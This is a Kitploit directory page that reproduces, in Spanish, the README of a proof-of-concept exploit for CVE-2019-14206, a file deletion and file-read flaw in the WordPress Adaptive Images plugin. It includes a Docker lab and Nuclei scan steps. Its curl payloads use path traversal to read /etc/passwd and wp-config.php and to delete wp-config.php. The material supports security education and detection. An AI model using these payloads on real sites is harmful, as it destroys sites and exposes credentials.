Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2019-14206-poc — Exploit de prueba de concepto para CVE-2019-14206, que demuestra la eliminación arbitraria de archivos en el plugin Adaptive Images de WordPress. Incluye laboratorio Docker, plantilla Nuclei y scripts de prueba manuales para educación en seguridad y validación. | Kitploit
Herramientas/GitHubGitHub/developerfred/cve-2019-14206-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubdeveloperfred/cve-2019-14206-poc

cve-2019-14206-poc

Exploit de prueba de concepto para CVE-2019-14206, que demuestra la eliminación arbitraria de archivos en el plugin Adaptive Images de WordPress. Incluye laboratorio Docker, plantilla Nuclei y scripts de prueba manuales para educación en seguridad y validación.

Ver Repositorio
5hace 8 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2019-14206 - Adaptive Images para WordPress - Eliminación Arbitraria de Archivos

📋 Índice

  1. Sobre la Vulnerabilidad
  2. Requisitos Previos
  3. Instalación
  4. Métodos de Prueba
    • Prueba Rápida
    • Prueba Completa con Docker
    • Prueba con Nuclei
    • Prueba Manual
  5. Interpretando Resultados
  6. Limpieza
  7. Solución de Problemas
  8. Mitigación
  9. Aviso Legal

🎯 Sobre la Vulnerabilidad

CVE-ID: CVE-2019-14206
Severidad: Alta (CVSS 6.5)
Plugin Afectado: Adaptive Images para WordPress
Versiones Afectadas: < 0.6.67

¿Qué permite esta vulnerabilidad?

Esta vulnerabilidad permite que un atacante remoto no autenticado elimine archivos arbitrarios en el servidor WordPress explotando el plugin Adaptive Images.

Impacto Real:

  • ❌ Eliminación de wp-config.php causando una caída completa del sitio
  • ❌ Exposición de credenciales de la base de datos vía LFI
  • ⚠️ Cadena de ataque que lleva a RCE (Ejecución Remota de Código)
  • 🔴 Compromiso total del sitio WordPress

Causa Raíz:

// El plugin usa entrada del usuario SIN sanitización
$settings = $_REQUEST['adaptive-images-settings'];

// Construye la ruta del archivo con parámetros controlados por el atacante
$cache_file = $wp_content . '/' . $cache_dir . '/' . $resolution . $request_uri;

// ELIMINA archivo arbitrario
unlink($cache_file);

💻 Requisitos Previos

Requisitos Mínimos:

  • Sistema Operativo: macOS, Linux o Windows
  • Nuclei: Versión 3.0 o superior (Instalar)
  • Bash: Versión 4.0 o superior
  • curl: Para pruebas manuales
  • PHP: Versión 7.0+ (opcional, para pruebas con servidor incorporado)

Verificando Requisitos Previos:

# Verificar Nuclei
nuclei --version

# Verificar Bash
bash --version

# Verificar curl
curl --version

# Verificar PHP (opcional)
php --version 2>/dev/null || echo "PHP no disponible (opcional)"

🚀 Instalación

Paso 1: Clonar o Descargar los Archivos

# Si estás en el directorio nuclei-templates
cd /Volumes/Codingsh/experimentos/nuclei-templates

# O descarga los archivos necesarios
git clone https://github.com/projectdiscovery/nuclei-templates.git
cd nuclei-templates

Paso 2: Verificar la Estructura de Archivos

# Verificar si los archivos existen
ls -la http/cves/2019/CVE-2019-14206.yaml
ls -la cve-2019-14206-poc/

Paso 3: Hacer Ejecutables los Scripts

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

chmod +x docker-test.sh
chmod +x docker-test-full.sh
chmod +x vulnerability-demo.sh
chmod +x local-test.sh
chmod +x real-target-test.sh

🧪 Métodos de Prueba

1. Prueba Rápida ⏱️ 2 minutos

Ejecuta la demostración completa que simula toda la explotación:

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc
./docker-test.sh

Qué sucede:

  • Crea un entorno de prueba completo
  • Simula la vulnerabilidad
  • Demuestra la eliminación de archivos
  • Valida la plantilla Nuclei

Salida esperada:

[🎉] SUCCESS: wp-config.php DELETED!
[!!!] WORDPRESS SITE IS NOW BROKEN!
✅ Vulnerability: CVE-2019-14206 confirmed
✅ Template Status: Production ready

2. Prueba Completa con Docker 🐳 10 minutos

Paso 1: Iniciar Entorno Docker

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc

# Si Docker está corriendo
docker-compose up -d

# Si Docker NO está corriendo, usa el simulador
./docker-test-full.sh

Paso 2: Acceder a WordPress

# El entorno estará disponible en
# http://localhost:8888

Paso 3: Verificar Plugin Vulnerable

# Verificar si el script vulnerable existe
curl http://localhost:8888/wp-content/plugins/adaptive-images/adaptive-images-script.php

Paso 4: Ejecutar Pruebas

# Prueba LFI
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Prueba de Eliminación de Archivos
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar si wp-config.php fue eliminado
ls -la /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test/wp-config.php

3. Prueba con Nuclei 🎯 5 minutos

Paso 1: Preparar Lista de Objetivos

# Crear archivo de objetivos
cat > targets.txt << 'EOF'
http://localhost:8888
https://target-wordpress-site.com
EOF

Paso 2: Ejecutar Escaneo

# Escaneo básico
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt

# Escaneo detallado
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -v

# Escaneo con depuración (OBLIGATORIO para bounty)
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -debug

# Guardar resultados
nuclei -t http/cves/2019/CVE-2019-14206.yaml -l targets.txt -o results.txt

Paso 3: Interpretar Resultados

# Ver resultados
cat results.txt

# Resultados positivos tendrán:
# [CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion

4. Prueba Manual 🔧 10 minutos

Paso 1: Iniciar Servidor PHP

cd /Volumes/Codingsh/experimentos/nuclei-templates/cve-2019-14206-poc/docker-test
php -S localhost:8888

Paso 2: Probar LFI (Lectura de Archivos)

# Intentar leer /etc/passwd
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=/etc/passwd"

# Intentar leer wp-config.php
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../wp-config.php"

Resultado esperado (LFI):

=== CVE-2019-14206 Vulnerability Test ===

[*] Settings received:
  source_file = /etc/passwd
  ...

[*] Cache file: /var/www/html/wp-content/ai-cache/1920/etc/passwd
[*] Source file: /etc/passwd

Paso 3: Probar Eliminación de Archivos

# Verificar si wp-config.php existe ANTES
ls -la wp-config.php

# Ejecutar exploit
curl "http://localhost:8888/adaptive-images-script.php?test=1&adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1"

# Verificar si wp-config.php fue eliminado DESPUÉS
ls -la wp-config.php

Resultado esperado (Eliminación de Archivos):

[+] SUCCESS: Arbitrary file deletion vulnerability confirmed!
[+] Target file deleted: ./../../..//wp-config.php

📊 Interpretando Resultados

Resultado Positivo (Vulnerable):

[CVE-2019-14206] [high] Adaptive Images for WordPress - Arbitrary File Deletion
http://target-wordpress-site.com/wp-content/plugins/adaptive-images/adaptive-images-script.php

Matchers matched:
- Plugin detected
- LFI vulnerability confirmed
- Arbitrary file deletion possible

Resultado Negativo (No Vulnerable):

[N/A] No results found

Posibles Razones para Falso Negativo:

Descargar herramienta